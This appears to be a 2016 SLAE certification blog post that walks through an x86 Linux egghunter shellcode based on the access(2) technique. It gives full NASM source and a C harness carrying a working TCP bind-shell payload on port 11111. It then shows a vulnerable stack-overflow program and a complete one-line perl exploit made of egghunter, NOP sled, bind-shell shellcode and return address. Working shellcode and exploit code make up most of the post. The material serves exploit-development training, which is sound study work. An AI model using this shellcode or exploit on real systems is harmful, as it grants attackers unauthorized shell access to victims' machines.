Sunday, 14 August 2016

SLAE Assignment 3 - EggHunter

SLAE Assignment 3 - EggHunter 

 

Objective 

 

The objective of the task is to create an egghunting shellcode . Egghunting shellcodes are very useful in cases where the area we control after a crash is less and can't afford a large shellcode . Egghunting shellcode normally uses less space and it can be used to mark our shellcode in memory via a known pattern . 

The best paper to learn about egghunter implementation is "Safely Searching Process Virtual Address Space" by skape . The author has provided 3 egghunter methods for Linux . 

They are , access (2) , access ( 2 ) revisited and sigaction (2) system calls .  

I am focusing on  the access (2) revisited method for this post . The following is the nasm file created.


rtv@dink0ism:~/Exercise3$ cat egg_hunter2.nasm
; Egg - 0xF890F990
global _start
        section .text
_start:
        xor edx, edx
allignpage:
        or dx, 0xfff
nextaddr:
        inc edx
        lea ebx, [edx+0x4]
        push byte 0x21    ; system call for access(2)
        pop eax
        int 0x80
        cmp al, 0xf2        ; checking for EFAULT
        je allignpage       ; going back to page allignment
        mov eax, 0xF890F990 ; egg
        mov edi, edx
        scasd
        jne nextaddr
        scasd
        jne nextaddr
        jmp edi


 The following are the major steps .
  1. Initialize the edx register
  2. Perform a page alignment operation 
  3. Syscall for access (2) is triggered
  4. Check if we got an EFAULT
  5. Start the comparison of egg once address is valid
  6. If we've found our egg, pass execution to it
 Lets create a sample program to test the egg hunting code . It uses a TCP bind shellcode which listens on 11111 as the final payload .



rtv@dink0ism:~/Exercise3$ cat shellcodeegg.c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
unsigned char egghunter[20];
void main()
{
/* bind shellcode port 11111*/
  unsigned char shellcode[256] = \
"\x90\xf9\x90\xf8\x90\xf9\x90\xf8" /* Egg Identifier */
"\x6a\x06\x6a\x01\x6a\x02\x31\xdb\xb3\x01\x31\xc9\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x89\xc6\x31\xdb\x53\x66\x68\x2b\x67\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\xb3\x02\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x6a\x01\x56\x31\xdb\xb3\x04\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x31\xdb\x53\x53\x56\xb3\x05\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x89\xc3\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89\xe1\xcd\x80";
 printf("Shellcode: %d bytes\n", strlen(shellcode));
/*egg hunter code */
 strcpy(egghunter,"\x31\xd2\x66\x81\xca\xff\x0f\x42\x8d\x5a\x04\x6a\x21\x58\xcd\x80\x3c\xf2\x74\xee\xb8\x90\xf9\x90\xf8\x89\xd7\xaf\x75\xe9\xaf\x75\xe6\xff\xe7");
 printf("Egghunter: %d bytes\n", strlen(egghunter));
 int (*ret)() = (int(*)())egghunter;
 ret();
}
Lets compile and execute the program .

It works and we got our bind shell after connecting to port 11111.

 

Practical Execution 

 

Now we can try the same in an actual scenario .

I will be using the below code which is vulnerable to stack based overflow . 


#include <stdio.h>
int main(int argc, char *argv[])
{
char buffer[256];
memcpy(buffer, argv[1],strlen(argv[1]));
printf(buffer);
}

After some basic fuzzing i was able to identify that the buffer overflows if we give 272 characters as input .


The final four bytes is the EIP . Also the buffer starts at 0xbffff3b0 .

Next we will try our exploit which uses egg hunting .

The final exploit should be like this ,

EGGHUNTER + 99 NOPS + SHELLCODE + EIP

which is


$(perl -e 'printf "\x31\xd2\x66\x81\xca\xff\x0f\x42\x8d\x5a\x04\x6a\x21\x58\xcd\x80\x3c\xf2\x74\xee\xb8\x90\xf9\x90\xf8\x89\xd7\xaf\x75\xe9\xaf\x75\xe6\xff\xe7" . "\x90" x 99 . "\x90\xf9\x90\xf8\x90\xf9\x90\xf8\x6a\x06\x6a\x01\x6a\x02\x31\xdb\xb3\x01\x31\xc9\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x89\xc6\x31\xdb\x53\x66\x68\x2b\x67\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\xb3\x02\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x6a\x01\x56\x31\xdb\xb3\x04\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x31\xdb\x53\x53\x56\xb3\x05\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x89\xc3\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89\xe1\xcd\x80" . "\xb0\xf3\xff\xbf"')

So we will try this out now and see the outcome ,


As expected we got our shellcode working .

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification
Student ID: SLAE – 739

All the files used can be found here https://github.com/rtv7/SLAE

No comments:

Post a Comment